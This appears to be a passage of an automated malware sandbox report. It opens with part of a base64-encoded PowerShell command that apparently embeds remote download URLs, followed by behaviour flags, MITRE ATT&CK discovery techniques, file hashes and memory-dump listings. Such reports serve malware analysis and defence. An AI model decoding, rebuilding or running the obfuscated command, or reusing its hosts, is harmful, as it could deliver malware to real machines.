QBHAFUAQQBSAFEAQgBzAEEARwBVAEEAWQB3AEIAMABBAEgASQBBAGIAdwBCADIAQQBHAEUAQQBiAEEAQgBsAEEARwA0AEEAZABBAEEAdQBBAEgAQQBBAGIAdwBCAHkAQQBHADQAQQBZAGIAUwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGsAQQBOAHcAQQB1AEEARABFAEEATgBRAEEAMwBBAEMANABBAE0AUQBBADEAQQBEAEkAQQBMAGcAQQAyAEEARABjAEEAWQBiAFMAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAWQBRAEIAcABBAEcAdwBBAGIAdwBCAHkAQQBHAHcAQQBhAFEAQgByAEEARwBVAEEATABnAEIAbQBBAEcARQBBAGIAUQBCAHAAQQBHAHcAQQBlAFEAQQA9ACIAOwBUAGIAcgA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAfQB9AA=="
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1196

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_myiezwr3.lxd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1196-134-0x000002648C710000-0x000002648C720000-memory.dmp

Filesize
64KB

Download
memory/1196-133-0x000002648C730000-0x000002648C752000-memory.dmp

Filesize
136KB

Download
memory/1196-140-0x000002648C710000-0x000002648C720000-memory.dmp

Filesize
64KB

Download
memory/1196-145-0x000002648C710000-0x000002648C720000-memory.dmp

Filesize
64KB

Download
memory/1196-146-0x000002648C710000-0x000002648C720000-memory.dmp

Filesize
64KB

Download
memory/1196-147-0x000002648C710000-0x000002648C720000-memory.dmp

Filesize
64KB

Download
memory/1196-148-0x000002648C710000-0x000002648C720000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing